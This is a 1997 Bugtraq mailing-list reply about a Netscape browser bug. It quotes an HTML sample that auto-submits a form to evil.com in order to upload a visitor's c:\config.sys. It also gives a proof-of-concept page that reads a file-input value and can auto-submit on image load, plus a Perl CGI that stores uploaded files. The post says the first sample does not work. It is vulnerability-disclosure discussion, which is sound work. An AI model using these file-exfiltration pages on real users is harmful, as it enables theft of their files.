Bugtraq mailing list archives
Re: Netscape Exploit
From: brandon () VV COM (Micah Brandon)
Date: Sat, 14 Jun 1997 19:57:55 -0400
At 07:21 PM 6/14/97 -0500, root wrote:
Here is a sample it isn't complete but you get the basic idea of what is
going on
<HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
<BODY onLoad="daForm.submit()">
<FORM
NAME="daForm"
ACTION="http://evil.com/cgi-bin/formmail.pl";
METHOD=POST>
<INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
Harddrive">
<INPUT TYPE=HIDDEN NAME="recipient" value="foobar () evil com">
and so on and so forth...
Ah....this won't work because you're onLoad'ing daForm before you've named
the form "daForm" plus the <INPUT TYPE=FILE...> line won't take a VALUE
attribute.
I've been hackin' at this, but I can't get it either. I can "see" the
value attribute being set but I don't think it's possible to change it with
Javascript. We're probably barking up the wrong tree. Anyway, take a look
at the code below. Perhaps someone can take it from here:
<HTML>
<HEAD>
<SCRIPT>
function ShowFilename() {
// Uncomment this line and comment the alert line if you want this
// script to "auto" submit
// document.forms[0].submit();
// Display filename
alert(document.forms[0].userfile.value);
}
</SCRIPT>
<TITLE>
Netscape Bug Test Page
</TITLE>
<BODY>
<CENTER>
<H2>Netscape Bug Test Page</H2>
<HR>
<FORM OnSubmit="ShowFilename()"
ACTION="send.cgi"
ENCTYPE="multipart/form-data"
METHOD="POST">
<INPUT TYPE=FILE NAME=userfile>
<INPUT TYPE=SUBMIT VALUE="Send File">
</FORM>
of an image trigger the ShowFilename script.
Together with uncommenting the submit() line
in the ShowFilename script, the form above will
submit itself automatically.
<IMG OnLoad="ShowFilename()" SRC="pix.gif">
-->
<HR>
</CENTER>
</BODY>
</HTML>
And send.cgi is...
#!/usr/bin/perl
# Header
print "Context-type: text/html\n\n";
print "<H2>YOUR FILE</H2>";
print "<PRE>";
while (<STDIN>) {
$FILETEXT .= $_;
print;
}
print "</PRE>";
# Save the file to your server as well
open(SOMEFILE, "> /tmp/fromweb");
print SOMEFILE $FILETEXT;
close(SOMEFILE);
---
micah
brandon () vv com
Current thread:
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program, (continued)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
- Netscape Exploit root (Jun 14)
- Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
- Re: Bug in SGI's /cgi-bin/handler Yaron Yanay (Jun 15)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- sendmail 8.8.6 released Eric Allman (Jun 14)
- Re: Netscape Exploit Roger Espel Llima (Jun 14)
- Re: Netscape Exploit Micah Brandon (Jun 14)
- Re: Netscape Exploit Manoj Kasichainula (Jun 15)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
- rshd gives away usernames David Holland (Jun 13)
- Re: rshd gives away usernames Erik Troan (Jun 13)
- Re: rshd gives away usernames Eric (Jun 13)
- Re: rshd gives away usernames Todd C. Miller (Jun 13)
- Re: rshd gives away usernames Alan Brown (Jun 14)
- Changing default UMASK for all daemons Dax Kelson (Jun 13)
- Re: Changing default UMASK for all daemons Joe Traister (Jun 14)
- Re: Changing default UMASK for all daemons Michael Helm (Jun 14)
- Re: Changing default UMASK for all daemons Tomasz R. Surmacz (Jun 16)